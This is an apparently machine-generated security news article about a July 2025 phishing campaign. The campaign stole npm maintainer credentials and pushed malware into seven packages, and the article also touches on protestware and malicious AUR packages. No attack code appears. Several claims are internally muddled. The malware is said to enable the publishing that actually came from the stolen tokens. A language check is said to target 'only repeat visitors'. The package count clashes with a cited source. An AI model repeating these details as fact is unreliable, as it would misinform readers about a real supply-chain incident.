Ethical Hacking News
A recent phishing campaign has infected seven npm packages with malware. The attack involved impersonating npm in email messages sent to project maintainers, tricking them into clicking on a typosquatted link that harvested their credentials. The malware allows the attackers to publish malicious versions of the packages directly onto the registry, bypassing detection and delivering from an external server a stealer component capable of gathering sensitive data from web browsers.
A phishing campaign was launched on npm in July 2025 to steal project maintainers' credentials and publish malicious packages. Several high-profile projects were compromised, leaving thousands of developers vulnerable to potential attacks. Malware was injected into 7 npm packages, including eslint-config-prettier and eslint-plugin-prettier, which can bypass detection and deliver a stealer component. The malware, dubbed Scavenger Loader, is designed to execute a DLL on Windows machines, potentially allowing remote code execution. Strong security measures, such as two-factor authentication and scoped tokens, are essential to prevent supply chain attacks.
The world of software development and cybersecurity has recently witnessed a devastating attack that highlights the ever-present threat of supply chain attacks. In July 2025, a phishing campaign was launched against project maintainers on the popular package repository, npm (Node Package Manager), with the ultimate goal of stealing their credentials and using them to publish malicious versions of their packages directly onto the registry.
According to cybersecurity researchers at Socket, the attack involved sending email messages impersonating npm in an attempt to trick project maintainers into clicking on a typosquatted link that harvested their credentials. The phishing campaign was so effective that it managed to compromise several high-profile projects, leaving thousands of developers vulnerable to potential attacks.
Malware Injected into 7 Npm Packages After Maintainer Tokens Stolen in Phishing Attack
In response to this cyberattack, the list of affected packages and their rogue versions has been compiled below - eslint-config-prettier (versions 8.10.1, 9.1.1, 10.1.6, and 10.1.7), eslint-plugin-prettier (versions 4.2.2 and 4.2.3), synckit (version 0.11.9), @pkgr/core (version 0.2.8), napi-postinstall (version 0.3.1), got-fetch (versions 5.1.11 and 5.1.12), is (versions 3.3.1 and 5.0.0). These packages have been found to be compromised by malware that has the capability to bypass detection and deliver from an external server a stealer component codenamed Scavenger Stealer, which can gather sensitive data from web browsers.
The malware, dubbed Scavenger Loader, is designed to execute a DLL on Windows machines, potentially allowing remote code execution. Furthermore, it is found that this malware has been integrated into various packages in such a way that the payload fitted within it is wholly written in JavaScript, meaning it can run on Windows, Linux, and macOS machines.
The malicious module captures system information and environment variables, and exfiltrates these details over a WebSocket connection. The campaign is deploying multiple payload families to maximize reach, with each message received over the socket being treated as executable JavaScript, providing an instant, interactive remote shell that executes with the same privileges as the host process, allowing unrestricted file system and network access.
The cyberattack highlights the importance of maintaining strong security measures, including two-factor authentication for project maintainers' accounts and the use of scoped tokens instead of passwords when publishing packages. The incident serves as a reminder to developers to regularly check their installed packages for any signs of compromise and take swift action in response to potential threats.
Furthermore, this attack coincides with an unrelated campaign that has flooded npm with 28 packages containing protestware functionality designed to disable mouse-based interaction on websites with specific domains such as Russian or Belarusian sites. These packages have been engineered to play the Ukrainian national anthem on a loop and can only work when the site visitor's browser language settings are set to Russian, thereby ensuring that only repeat visitors are targeted.
This campaign underscores the potential risks associated with nested dependencies, which may not manifest until days or weeks after their installation. It also highlights the need for developers to remain vigilant in monitoring their projects' security and be aware of the potential consequences of actions taken by other developers.
In addition to these npm packages, the Arch Linux team has recently removed three malicious AUR (Arch User Repository) packages that were uploaded to the repository and harbored hidden functionality to install a remote access trojan called Chaos RAT. The affected packages were published by a user named "danikpapas" on July 16, 2025.
The recent cyberattack against npm has sent shockwaves through the software development community, underscoring the ever-present threat of supply chain attacks and the importance of robust security measures to protect developer projects from potential threats.
Related Information:
https://www.ethicalhackingnews.com/articles/A-Global-Supply-Chain-Attack-7-npm-Packages-Infected-with-Malware-via-Phishing-Scam-ehn.shtml
https://thehackernews.com/2025/07/malware-injected-into-6-npm-packages.html
Published: Wed Jul 23 07:48:33 2025 by llama3.2 3B Q4_K_M
